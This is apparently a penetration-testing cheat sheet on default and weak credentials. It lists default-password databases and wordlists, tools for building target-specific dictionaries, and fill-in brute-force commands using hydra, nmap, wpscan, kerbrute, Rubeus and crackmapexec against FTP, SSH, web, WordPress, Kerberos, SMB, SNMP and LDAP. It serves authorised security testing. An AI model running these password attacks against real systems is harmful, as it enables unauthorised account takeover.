Introduction

One way to gain access to a company's website, service, infrastructure, computers... can be achieved using default credentials or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".

Default credentials

Many web applications, services, and devices have a default administrator account with a default password. However, the password might not have been changed after the device was set up. This is an opportunity for the attacker to obtain the default credentials for the technology to gain access.

Try to identify the software, find whether it uses default passwords and if so, what they are:

• Search for "<SOFTWARE> default password".

• Try the same user as the password.

• Review the documentation.

• Review the source code, if available.

• Check for default credentials databases:

  • Cirt - Default passwords

  • SectLists - Default Credentials

  • Passwords Database

  • Data Recovery - Default Passwords

  • DefaultCreds Cheat Sheet

Dictionaries

In case the default credentials for the target did not work, an attacker could use already existing dictionaries with default passwords or craft a dictionary based on the password policies of the targeted company.

Existing dictionaries

There are already built dictionaries with thousands of passwords.

• Kaonashi

• Rockyou

• SecList - Passwords

Crafting dictionaries

Based on the information of the target we can craft personalized dictionaries. Moreover, there are tools that can facilitate the attacker the work.

• Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.

cewl <URL> --with-numbers -n -m 5 -d 3 -w output.txt

• Crunch: you can specify a character set, and it will generate a huge number of permutations using the characters you specify.

# Generate a combination with a set of alphanumeric characters
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789

• Cupp: Generates passwords based on provided keywords about the target.

cupp -i

Attacks

This subsection contains commands to perform brute force attacks on different technologies.

FTP

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT>] | -p <PASSWORD>} ftp://<TARGET>

SSH

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}"  <TARGET>

Web

An attacker could encounter different login portals during a web analysis that can be brute-forced.

Basic Authentication

hydra -I {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} -f <IP> -s <PORT> http-get <URL>

Post Authentication

hydra {-l <username> | -L <USERS.TXT>}  {-p <PASSWORD> | -P <WORDLIST.txt>} <TARGET> -V http-form-post '<ENDPOINT>:<usernam=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS M'

Note: Nowadays, hydra does not support forms with CRFS tokens. Thus, a solution would be to use Burp Suite.

WordPress

wpscan --url <WORDPRESS_URL> –-passwords <WORDLIST.TXT> -–usernames <USERS.TXT> -–max-threads <NUMBER_THREADS>

Kerberos

There are several ways to perform a brute-force attack against a Kerberos service.

# with a list of users
python kerbrute.py -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users: <USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>

POP3

nmap -n -p110 --script pop3-brute <TARGET>
hydra  {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V

SMB

First of all, check the passwords policy to avoid banning accounts.

crackmapexec smb <IP> --pas-pol

Then, you can brute-forcing with the following tools.

crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>

SNMP

You can brute force SNMP community strings with hydra.

hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp

LDAP

Attempts to brute-force LDAP authentication. By default, it uses the built-in username and password lists. In order to use your own lists use the userdb and passdb script arguments.

nmap --script ldap-brute -p 389 <IP>

Another option is to use hydra.

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>

References

• Authentication Testing

• Brute Force - CheatSheet